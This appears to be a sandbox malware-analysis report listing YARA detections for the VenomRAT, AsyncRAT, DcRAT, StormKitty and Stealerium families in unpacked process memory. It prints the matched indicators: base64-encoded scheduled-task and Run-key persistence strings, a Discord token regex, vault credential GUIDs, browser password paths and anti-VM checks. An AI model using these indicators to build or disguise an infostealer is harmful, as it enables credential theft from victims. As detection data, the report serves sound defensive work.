0.2.vfdjo.exe.3d0d33a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a181:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1f3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a27d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a30f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a379:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3eb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a481:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a511:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d38:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163eac:$s6: VirtualBox 0x173a2b:$s6: VirtualBox 0x16f448:$s8: Win32_ComputerSystem 0x173991:$s8: Win32_ComputerSystem 0x16c574:$s9: Win32_Process Where ParentProcessID= 0x16c191:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c22e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c343:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c42b:$cnc4: POST / HTTP/1.1
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
4.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241408:$a1: havecamera 0x28c232:$a2: timeout 3 > NUL 0x28f5b5:$a3: START "" " 0x28faca:$a3: START "" " 0x28f9a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28fa42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
4.2.RegAsm.exe.400000.0.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x29292c:$str01: Processe: 0x2927e8:$str02: Compname: 0x2928e2:$str04: SandBoxie: 0x292878:$str08: WEBCAMS COUNT: 0x29289c:$str09: [Virtualization] 0x2930ea:$str10: [Open google maps]( 0x294b61:$str11: Remember password: 0x287c54:$str12: Target.Browsers.Firefox 0x26f3cf:$str13: Modules.Keylogger 0x277292:$str14: ClipperAddresses 0x279437:$str15: ChromiumPswPaths 0x279449:$str15: ChromiumPswPaths 0x27538c:$str16: DetectedBankingServices 0x2754f5:$str17: DetectCryptocurrencyServices 0x2833ee:$str18: CheckRemoteDebuggerPresent 0x284373:$str19: GetConnectedCamerasCount
4.2.RegAsm.exe.400000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x5db:$sk01: LimerBoy/StormKitty 0x252952:$str01: set_sUsername 0x25fe84:$str03: set_sExpMonth 0x27523f:$str04: WritePasswords 0x275cf9:$str05: WriteCookies 0x279448:$str06: sChromiumPswPaths 0x279423:$str07: sGeckoBrowserPaths 0x28eacf:$str10: encrypted_key":"(.*?)"
4.2.RegAsm.exe.400000.0.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28fa42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x28bb12:$str04: Pac_ket 0x29b830:$str05: Perfor_mance 0x29b874:$str06: Install_ed 0x245f05:$str07: get_IsConnected 0x25c3ca:$str08: get_ActivatePo_ng 0x270305:$str09: isVM_by_wim_temper 0x29c122:$str10: save_Plugin 0x28c232:$str11: timeout 3 > NUL 0x29b410:$str12: ProcessHacker.exe 0x29b602:$str13: Select * from Win32_CacheMemory
4.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28fa42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28f9a5:$s2: L2Mgc2NodGFza3MgL2
4.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29b602:$q1: Select * from Win32_CacheMemory 0x29b642:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x29b690:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x29b6de:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
4.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293806:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
4.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2991a1:$s1: \VPN\NordVPN 0x299187:$s2: \VPN\OpenVPN 0x299169:$s3: \VPN\ProtonVPN
4.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28deeb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28df5d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28dfe7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28e079:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28e0e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28e155:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28e1eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28e27b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x27dff4:$s2: GetAntivirus 0x29405a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28d4a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28eacd:$s6: "encrypted_key":"(.*?)"
4.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28baa2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287c16:$s6: VirtualBox 0x297795:$s6: VirtualBox 0x2931b2:$s8: Win32_ComputerSystem 0x2976fb:$s8: Win32_ComputerSystem 0x2902de:$s9: Win32_Process Where ParentProcessID= 0x28fefb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ff98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2900ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290195:$cnc4: POST / HTTP/1.1
0.2.vfdjo.exe.3fd95f0.4.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0.2.vfdjo.exe.3fd95f0.4.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.vfdjo.exe.3fd95f0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.vfdjo.exe.3fd95f0.4.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0.2.vfdjo.exe.3fd95f0.4.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
0.2.vfdjo.exe.3fd95f0.4.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x23f608:$a1: havecamera 0x28a432:$a2: timeout 3 > NUL 0x28d7b5:$a3: START "" " 0x28dcca:$a3: START "" " 0x28dba5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28dc42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
0.2.vfdjo.exe.3fd95f0.4.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x290b2c:$str01: Processe: 0x2909e8:$str02: Compname: 0x290ae2:$str04: SandBoxie: 0x290a78:$str08: WEBCAMS COUNT: 0x290a9c:$str09: [Virtualization] 0x2912ea:$str10: [Open google maps]( 0x292d61:$str11: Remember password: 0x285e54:$str12: Target.Browsers.Firefox 0x26d5cf:$str13: Modules.Keylogger 0x275492:$str14: ClipperAddresses 0x277637:$str15: ChromiumPswPaths 0x277649:$str15: ChromiumPswPaths 0x27358c:$str16: DetectedBankingServices 0x2736f5:$str17: DetectCryptocurrencyServices 0x2815ee:$str18: CheckRemoteDebuggerPresent 0x282573:$str19: GetConnectedCamerasCount
0.2.vfdjo.exe.3fd95f0.4.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x2fc1fb:$sk01: LimerBoy/StormKitty 0x250b52:$str01: set_sUsername 0x25e084:$str03: set_sExpMonth 0x27343f:$str04: WritePasswords 0x273ef9:$str05: WriteCookies 0x277648:$str06: sChromiumPswPaths 0x277623:$str07: sGeckoBrowserPaths 0x28cccf:$str10: encrypted_key":"(.*?)"
0.2.vfdjo.exe.3fd95f0.4.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28dc42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x289d12:$str04: Pac_ket 0x299a30:$str05: Perfor_mance 0x299a74:$str06: Install_ed 0x244105:$str07: get_IsConnected 0x25a5ca:$str08: get_ActivatePo_ng 0x26e505:$str09: isVM_by_wim_temper 0x29a322:$str10: save_Plugin 0x28a432:$str11: timeout 3 > NUL 0x299610:$str12: ProcessHacker.exe 0x299802:$str13: Select * from Win32_CacheMemory
0.2.vfdjo.exe.3fd95f0.4.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28dc42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28dba5:$s2: L2Mgc2NodGFza3MgL2
0.2.vfdjo.exe.3fd95f0.4.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x299802:$q1: Select * from Win32_CacheMemory 0x299842:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x299890:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x2998de:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.vfdjo.exe.3fd95f0.4.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x291a06:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.vfdjo.exe.3fd95f0.4.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2973a1:$s1: \VPN\NordVPN 0x297387:$s2: \VPN\OpenVPN 0x297369:$s3: \VPN\ProtonVPN
0.2.vfdjo.exe.3fd95f0.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28c0eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28c15d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28c1e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28c279:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28c2e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28c355:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28c3eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28c47b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.vfdjo.exe.3fd95f0.4.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x2fc1e8:$x2: https://github.com/LimerBoy/StormKitty 0x2fc204:$x3: StormKitty 0x27c1f4:$s2: GetAntivirus 0x29225a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28b6a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28cccd:$s6: "encrypted_key":"(.*?)"
0.2.vfdjo.exe.3fd95f0.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x289ca2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x285e16:$s6: VirtualBox 0x295995:$s6: VirtualBox 0x2913b2:$s8: Win32_ComputerSystem 0x2958fb:$s8: Win32_ComputerSystem 0x28e4de:$s9: Win32_Process Where ParentProcessID= 0x28e0fb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28e198:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28e2ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28e395:$cnc4: POST / HTTP/1.1
4.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
4.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
4.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
4.2.RegAsm.exe.525b8a.1.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
4.2.RegAsm.exe.525b8a.1.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths 0x1556bf:$str15: ChromiumPswPaths 0x151602:$str16: DetectedBankingServices 0x15176b:$str17: DetectCryptocurrencyServices 0x15f664:$str18: CheckRemoteDebuggerPresent 0x1605e9:$str19: GetConnectedCamerasCount
4.2.RegAsm.exe.525b8a.1.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebc8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.*?)"
4.2.RegAsm.exe.525b8a.1.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x177aa6:$str05: Perfor_mance 0x177aea:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x178398:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x177686:$str12: ProcessHacker.exe 0x177878:$str13: Select * from Win32_CacheMemory
4.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2
4.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x177878:$q1: Select * from Win32_CacheMemory 0x1778b8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x177906:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x177954:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
4.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
4.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN
4.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.RegAsm.exe.525b8a.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1
0.2.vfdjo.exe.2c2a79e.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x122e:$x2: https://github.com/LimerBoy/StormKitty 0x7053a:$x2: https://github.com/LimerBoy/StormKitty 0x124a:$x3: StormKitty 0x70556:$x3: StormKitty
0.2.vfdjo.exe.43fad9a.6.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0.2.vfdjo.exe.43fad9a.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.vfdjo.exe.43fad9a.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.vfdjo.exe.43fad9a.6.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0.2.vfdjo.exe.43fad9a.6.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
0.2.vfdjo.exe.43fad9a.6.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
0.2.vfdjo.exe.43fad9a.6.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths 0x1556bf:$str15: ChromiumPswPaths 0x151602:$str16: DetectedBankingServices 0x15176b:$str17: DetectCryptocurrencyServices 0x15f664:$str18: CheckRemoteDebuggerPresent 0x1605e9:$str19: GetConnectedCamerasCount
0.2.vfdjo.exe.43fad9a.6.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebc8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.*?)"
0.2.vfdjo.exe.43fad9a.6.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x177aa6:$str05: Perfor_mance 0x177aea:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x178398:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x177686:$str12: ProcessHacker.exe 0x177878:$str13: Select * from Win32_CacheMemory
0.2.vfdjo.exe.43fad9a.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2
0.2.vfdjo.exe.43fad9a.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x177878:$q1: Select * from Win32_CacheMemory 0x1778b8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x177906:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x177954:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.vfdjo.exe.43fad9a.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.vfdjo.exe.43fad9a.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN
0.2.vfdjo.exe.43fad9a.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.vfdjo.exe.43fad9a.6.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
